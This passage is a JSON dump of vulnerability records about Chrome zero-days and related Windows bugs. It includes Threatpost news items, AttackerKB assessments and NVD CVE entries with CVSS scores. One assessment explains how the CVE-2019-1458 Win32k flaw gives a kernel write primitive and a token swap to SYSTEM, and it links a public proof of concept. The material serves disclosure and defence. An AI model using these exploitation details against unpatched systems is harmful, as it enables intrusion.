flaws](<https://threatpost.com/tag/use-after-free/>) have plagued Google\u2019s Chrome browser as of recent. In [August, ](<https://threatpost.com/google-high-severity-blink-browser-engine-flaw/147770/>)Google disclosed a high-severity use-after-free vulnerability (CVE-2019-5869) in Blink, an open-source [browser engine](<https://www.chromium.org/blink>) that powers the Google Chrome browser, that could enable remote attackers to execute code and carry out other malicious attacks.\n\nGoogle on Thursday also disclosed another high-severity vulnerability (CVE-2019-13721) in PDFium, which was developed by Foxit and Google and provides developers with capabilities to leverage an open-source software library for viewing, and searching PDF documents.\n\nThis flaw is also a use-after-free vulnerability but there are no reports of it being exploited in the wild. It was disclosed by a researcher under the alias \u201cbanananapenguin\u201d who received a $7500 bounty through Google\u2019s vulnerability disclosure program for the discovery.\n\n_This post was updated on Nov. 1 at 4pm EST to reflect further details about the detected exploit._\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n\n**Share this article:**\n\n * [Editor's Picks](<https://threatpost.com/category/editors-picks/>)\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "modified": "2019-11-01T15:35:03", "published": "2019-11-01T15:35:03", "id": "THREATPOST:74F8E9B3D3CB64CAF2AF0B54DE29C9A6", "href": "https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/", "type": "threatpost", "title": "Google Discloses Chrome Flaw Exploited in the Wild", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-21T12:26:16", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2020-15999", "CVE-2020-16000", "CVE-2020-16001", "CVE-2020-16002", "CVE-2020-16003", "CVE-2020-6418"], "description": "Google released an [update](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) to its Chrome browser that patches a zero-day vulnerability in the software\u2019s FreeType font rendering library that was actively being exploited in the wild.\n\nSecurity researcher Sergei Glazunov of [Google Project Zero](<https://googleprojectzero.blogspot.com/>) discovered [the bug](<https://twitter.com/benhawkes/status/1318640422571266048>) which is classified as a type of memory-corruption flaw called a heap buffer overflow in FreeType. Glazunov informed Google of the vulnerability on Monday. Project Zero is an internal security team at the company aimed at finding zero-day vulnerabilities.\n\nBy Tuesday, Google already had released a stable channel update, Chrome version 86.0.4240.111, that deploys five security fixes for Windows, Mac & Linux\u2013among them a fix for the zero-day, which is being tracked as CVE-2020-15999 and is rated as high risk. \n[](<https://threatpost.com/newsletter-sign/>) \n\u201cGoogle is aware of reports that an exploit for CVE-2020-15999 exists in the wild,\u201d Prudhvikumar Bommana of the Google Chrome team wrote in a [blog post](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) announcing the update Tuesday. Google did not reveal further details of the active attacks that researchers observed.\n\n[Andrew R. Whalley](<https://twitter.com/arw>), a member of the Chrome security team, gave his team kudos on [Twitter](<https://twitter.com/arw/status/1318640817762807810>) for the \u201csuper-fast\u201d response to the zero-day.\n\nStill, Ben Hawkes, technical lead for the Project Zero team, warned that while Google researchers only observed the Chrome exploit, it\u2019s possible that other implementations of FreeType might be vulnerable as well since Google was so quick in its response to the bug. He referred users to a [fix](<https://savannah.nongnu.org/bugs/?59308>) by Glazunov posted on the FreeType Project page and urged them to update other potentially vulnerable software.\n\n\u201cThe fix is also in today\u2019s stable release of FreeType 2.10.4,\u201d Hawkes [tweeted](<https://twitter.com/benhawkes/status/1318640423485624320>).\n\nMeanwhile, security researchers took to Twitter to encourage people to update their Chrome browsers immediately to avoid falling victim to attackers aiming to exploit the flaw.\n\n\u201cMake sure you update your Chrome today! (restart it!),\u201d [tweeted](<https://twitter.com/securestep9/status/1318679358840754176>) London-based application security consultant Sam Stepanyan.\n\nIn addition to the FreeType zero day, Google patched four other bugs\u2014three of high risk and one of medium risk\u2013in the Chrome update released this week.\n\nThe high-risk vulnerabilities are: CVE-2020-16000, described as \u201cinappropriate implementation in Blink;\u201d CVE-2020-16001, described as \u201cuse after free in media;\u201d and CVE-2020-16002, described as \u201cuse after free in PDFium,\u201d according to the blog post. The medium-risk bug is being tracked as CVE-2020-16003, described as \u201cuse after free in printing,\u201d Bommana wrote.\n\nSo far in the last 12 months Google has patched three zero-day vulnerabilities in its Chrome browser. Prior to this week\u2019s FreeType disclosure, the first was a critical remote code execution vulnerability [patched last Halloween night](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>) and tracked as CVE-2019-13720, and the second was a type of memory confusion bug tracked as CVE-2020-6418 that was [fixed in February](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>).\n", "modified": "2020-10-21T12:23:29", "published": "2020-10-21T12:23:29", "id": "THREATPOST:6F7E512F15913694CF17A906715FE678", "href": "https://threatpost.com/google-patches-zero-day-browser/160393/", "type": "threatpost", "title": "Google Patches Actively-Exploited Zero-Day Bug in Chrome Browser", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-04T20:29:51", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2020-14750", "CVE-2020-15999", "CVE-2020-16004", "CVE-2020-16005", "CVE-2020-16007", "CVE-2020-16008", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16011", "CVE-2020-6418"], "description": "Flaws in Google\u2019s Chrome desktop and Android-based browsers were patched Monday in an effort to prevent known exploits from being used by attackers. Two separate security bulletins issued by Google warned that it is aware of reports that exploits for both exist in the wild. Google\u2019s Project Zero went one step further and asserted that both bugs are actively being exploited.\n\nIn its [Chrome browser update](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) for Windows, Mac and Linux, Google said that version 86.0.4240.183 fixes 10 vulnerabilities. Tracked as CVE-2020-16009, this bug is the most troubling, rated high-severity and is one of the two with active exploits. The vulnerability is tied to Google\u2019s open source JavaScript and WebAssembly engine called V8. In its disclosure, the flaw is described as an \u201cinappropriate implementation in V8\u201d.\n\nClement Lecigne of Google\u2019s Threat Analysis Group and Samuel Gross of Google Project Zero discovered the Chrome desktop bug on Oct. 29, according to a [blog post](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) announcing the fixes by Prudhvikumar Bommana of the Google Chrome team. If exploited, the V8 bug can be used for remote code execution, according to a separate analysis by Project Zero\u2019s team. \n[](<https://threatpost.com/newsletter-sign/>)\n\nAs for the Android OS-based Chrome browser, also with an active exploit in the wild, Google warned [on Monday](<https://chromereleases.googleblog.com/2020/11/chrome-for-android-update.html>) of a sandbox escape bug (CVE-2020-16010). This vulnerability is rated high-severity and opened up a possible attack based on \u201cheap buffer overflow in UI on Android\u201d conditions. Credited for discovering the bug on Oct. 31 is Maddie Stone, Mark Brand and Sergei Glazunov of Google Project Zero.\n\n## **\u2018Actively Exploited in the Wild\u2019**\n\nGoogle said it was withholding the technical details of both bugs, pending the distribution of patches to effected endpoints. While Google said publicly known exploits existed for both bugs, it did not indicate that either one was under active attack. Google\u2019s own Project Zero technical lead Ben Hawkes tweeted on Monday that both were under active attack.\n\n\u201cToday Chrome fixed two more vulnerabilities that were being actively exploited in the wild (discovered by Project Zero/Google TAG last week). CVE-2020-16009 is a v8 bug used for remote code execution, CVE-2020-16010 is a Chrome sandbox escape for Android,\u201d he wrote.\n\n> Today Chrome fixed two more vulnerabilities that were being actively exploited in the wild (discovered by Project Zero/Google TAG last week). CVE-2020-16009 is a v8 bug used for remote code execution, CVE-2020-16010 is a Chrome sandbox escape for Android. <https://t.co/IOhFwT0Wx1>\n> \n> \u2014 Ben Hawkes (@benhawkes) [November 2, 2020](<https://twitter.com/benhawkes/status/1323374326150701057?ref_src=twsrc%5Etfw>)\n\nAs a precaution, Google said in its security update that it would \u201calso retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed,\u201d according to the post.\n\n## **The Other Android Bugs**\n\nThe new Chrome Android release also includes stability and performance improvements, according to the Google Chrome team.\n\nVulnerabilities patched in the Chrome desktop update included a \u201cuse after free\u201d bug (CVE-2020-16004); an \u201cinsufficient policy enforcement in ANGLE\u201d flaw (CVE-2020-16005); an \u201cinsufficient data validation in installer\u201d issue (CVE-2020-16007) and a \u201cstack buffer overflow in WebRTC\u201d bug (CVE-2020-16008). Lastly there Google reported a \u201cheap buffer overflow in UI on Windows\u201d tracked as (CVE-2020-16011).\n\nThis week\u2019s Chrome updates come on the heels of zero-day bug [reported and patched last week](<https://threatpost.com/google-patches-zero-day-browser/160393/>) by Google effecting Chrome on Windows, Mac and Linux. The flaw (CVE-2020-15999), rated high-risk, is a vulnerability in Chrome\u2019s FreeType font rendering library.\n\nThe latest vulnerabilities mean that in that just over 12 months Google has patched a string of serious vulnerabilities in its Chrome browser. In addition to the three most recently reported flaws, the first was a critical remote code execution vulnerability [patched last Halloween night](<https://www.zdnet.com/article/halloween-scare-google-discloses-chrome-zero-day-exploited-in-the-wild/>) and tracked as CVE-2019-13720, and the second was a type of memory confusion bug tracked as CVE-2020-6418 that was [fixed in February](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>).\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar ](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "modified": "2020-11-03T17:23:23", "published": "2020-11-03T17:23:23", "id": "THREATPOST:DF87733B74489628AB9F2C89704380A9", "href": "https://threatpost.com/chrome-holes-actively-targeted/160890/", "type": "threatpost", "title": "Two Chrome Browser Updates Plug Holes Actively Targeted by Exploits", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2021-04-07T15:16:36", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2021-21166"], "description": "Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 08, 2021 5:47pm UTC reported:\n\nReported as exploited in the wild at <https://threatpost.com/google-patches-actively-exploited-flaw-in-chrome-browser/164468/> and at <https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html>.\n\nDetails are still scant on this vulnerability as they are being withheld by Google until more people have patched the issue, which was fixed in Chrome 89.0.4389.72. All that we know is that the bug is labeled as an `Object lifecycle issue in audio` and was found by `Alison Huffman, Microsoft Browser Vulnerability Research on 2021-02-11`.\n\nGiven the description of this vulnerability as well as its link to a similar vulnerability exploited in the wild in the past (see <https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>), its likely that this is a UAF vulnerability. Given the one used in <https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/> was a bug in the same component which was then used in the WizardOpium attacks, its likely that this vulnerability will lead to full compromise of the system given past history.\n\nUsers are encouraged to disable JavaScript where possible, particularly for untrusted sites, as this is often needed in order to successfully exploit UAF vulnerabilities in the browser. However this is only a temporary fix, and it is strongly encouraged that users instead upgrade to Chrome 89.0.4389.72 or later, Given there is already active exploitation of this vulnerability, and given the history of bugs within this component, there is a good possibility that we may see more widespread exploitation of this issue in the near future.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 3\n", "modified": "2021-03-12T00:00:00", "published": "2021-03-09T00:00:00", "id": "AKB:DFA61FBF-688B-44E9-8B09-134E93207AD9", "href": "https://attackerkb.com/topics/VffVzAAdhq/cve-2021-21166", "type": "attackerkb", "title": "CVE-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-22T06:10:03", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Google Chrome is a web browser used to access the Internet. Successful exploitation of the most severe vulnerabilities could allow an attacker to execute arbitrary code in the context of the browser. Depending on the privileges associated with the application, an attacker could install programs; view, change, or delete data; or create new accounts with full user rights. If this application has been configured to have fewer user rights on the system, exploitation of the most severe of these vulnerabilities could have less impact than if it was configured with administrative rights.\n\nUse after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**busterb** at November 01, 2019 6:45pm UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 2**space-r7** at November 01, 2019 7:32pm UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 2**gwillcox-r7** at November 22, 2020 2:51am UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n", "modified": "2020-10-13T00:00:00", "published": "2019-10-10T00:00:00", "id": "AKB:3609E46B-E023-474D-B14A-026E01AF8EA9", "href": "https://attackerkb.com/topics/EfbjmUx1X2/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium", "type": "attackerkb", "title": "Chrome 0-day exploit CVE-2019-13720 used in Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-07T21:16:02", "bulletinFamily": "info", "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193"], "description": "Use after free in Blink in Google Chrome prior to 89.0.4389.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 15, 2021 6:18am UTC reported:\n\nReported as exploited in the wild at <https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html> and at <https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>.\n\nThis bug seems to have scarce details from what I can tell online, however it appears to be a UAF bug within Blink that was reported by an anonymous researcher on 2021-03-09. The details for this bug are currently locked so that only Google employees can access it, but should it be opened to the public the details will be at <https://bugs.chromium.org/p/chromium/issues/detail?id=1186287>.\n\nAs per usual the advice to protect against UAF bugs in browsers is to disable JavaScript on untrusted websites via a plugin such as NoScript. Since most UAF\u2019s require JavaScript to be enabled to conduct exploitation, this will act as an effective mitigation in most cases, but users should not rely on this as their sole protection mechanism.\n\nIt is interesting to see that this is the third 0day exploited in the wild this year in Chrome, alongside CVE-2021-21166, a object lifecycle issue in the audio component, and CVE-2021-21148, a heap buffer overflow within the V8 scripting engine. Time will tell if this trend continues though, but it is interesting to see such an regular cadence of vulnerabilities being exploited in the wild.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 3\n", "modified": "2021-03-24T00:00:00", "published": "2021-03-16T00:00:00", "id": "AKB:C300BC5A-FE8F-4274-AFA8-C1F47411FEC1", "href": "https://attackerkb.com/topics/ACMmdhOpt2/cve-2021-21193", "type": "attackerkb", "title": "CVE-2021-21193", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-18T06:36:55", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka \u2018Win32k Elevation of Privilege Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 19, 2020 5:31pm UTC reported:\n\nKnown as WizardOpium for its use in the WizardOpium attacks, and first written about by Kaspersky Labs. The writeup by Kaspersky Labs can be found at <https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/> which shows that this vulnerability was used in conjunction with CVE-2019-13720, which was a 0day in the Chrome browser at the time that occurred due to a race condition between two threads.\n\nIn the WizardOpium attacks, the Chrome vulnerability, aka CVE-2019-13720, was first used to gain an arbitrary read/write primitive in the Chrome render process that lead to arbitrary code execution as the Chrome render (read more on this at <https://bugs.chromium.org/p/chromium/issues/detail?id=888923> if your interested). However this still left attackers with a problem: they needed some way to escape the Chrome render\u2019s sandbox if they wanted to get persistent access to the target.\n\nThis is where CVE-2019-1458 came in. Looking at the advisory at <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458> we can see this vulnerability affected quite a wide range of targets, going all the way from Windows 7 up to Windows 10 v1607. Later versions of Windows 10 are not affected, however.\n\nIf one dives around the internet a little bit more though they will stumble across <https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html> which was written by the Project Zero team at Google which explains the vulnerability quite well. In essence there is a Uninitialized Variable error in Windows within its Windows Switching code whereby the field `*(gpsi + 0x154)` in the global structure `tagSERVERINFO`, which describes system windows (such as menus, desktops, switch windows, etc), which was not properly initialized at the start of a function, which allowed user mode code to set extra window data in a task switch window of Window class `FNID_SWITCH`, or `0x280`, which can normally only be set by the kernel. Even worse though is the fact that this extra window data is essentially a pointer which is then dereferenced and then written to, which grants the attacker a limited arbitrary write primitive in kernel mode, which then can then use to perform limited controlled writes to kernel memory and take over the system. Attackers then used this limited kernel write primitive to overwrite their current process\u2019s access token value with the value of the SYSTEM process\u2019s access token value, thereby allowing them to execute code as SYSTEM.\n\nIf one then looks at <https://github.com/piotrflorczyk/cve-2019-1458_POC>, which does a deep technical dive into all of the details of this vulnerability, one can see that the affected function was `InitFunctionTables()` within `win32k.sys`, which didn\u2019t appropriately initialize the fields `*(gpsi+0x14E)`, `*(gpsi+0x154)`, and `*(gpsi+0x180)`, despite initializing other fields within the same structure. Microsoft\u2019s patch ensured that these fields were all set up and initialized with appropriate values at the start of the `InitFunctionTables()` call, thus preventing this issue from occurring.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 3\n", "modified": "2020-07-24T00:00:00", "published": "2019-12-10T00:00:00", "id": "AKB:C5336A4C-EEE0-4EA3-AD28-85F0EF3F0F75", "href": "https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458", "type": "attackerkb", "title": "CVE-2019-1458", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-04-05T12:39:33", "description": "Insufficient data validation in Chrome on iOS in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-03-09T18:15:00", "title": "CVE-2021-21164", "type": "cve", "cwe": ["CWE-346"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21164"], "modified": "2021-04-05T02:15:00", "cpe": ["cpe:/o:fedoraproject:fedora:32"], "id": "CVE-2021-21164", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21164", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-08T13:40:59", "description": "Insufficient data validation in Reader Mode in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page and a malicious server.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-03-09T18:15:00", "title": "CVE-2021-21163", "type": "cve", "cwe": ["CWE-346"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21163"], "modified": "2021-04-07T12:15:00", "cpe": ["cpe:/o:fedoraproject:fedora:32"], "id": "CVE-2021-21163", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21163", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-08T13:40:59", "description": "Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "title": "CVE-2021-21161", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21161"], "modified": "2021-04-07T12:15:00", "cpe": ["cpe:/o:fedoraproject:fedora:32"], "id": "CVE-2021-21161", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21161", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-08T13:40:59", "description": "Heap buffer overflow in WebAudio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "title": "CVE-2021-21160", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21160"], "modified": "2021-04-07T12:15:00", "cpe": ["cpe:/o:fedoraproject:fedora:32"], "id": "CVE-2021-21160", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21160", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-08T13:40:59", "description": "Use after free in WebRTC in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "title": "CVE-2021-21162", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21162"], "modified": "2021-04-07T12:15:00", "cpe": ["cpe:/o:fedoraproject:fedora:32"], "id": "CVE-2021-21162", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21162", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-08T13:40:59", "description": "Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "title": "CVE-2021-21159", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 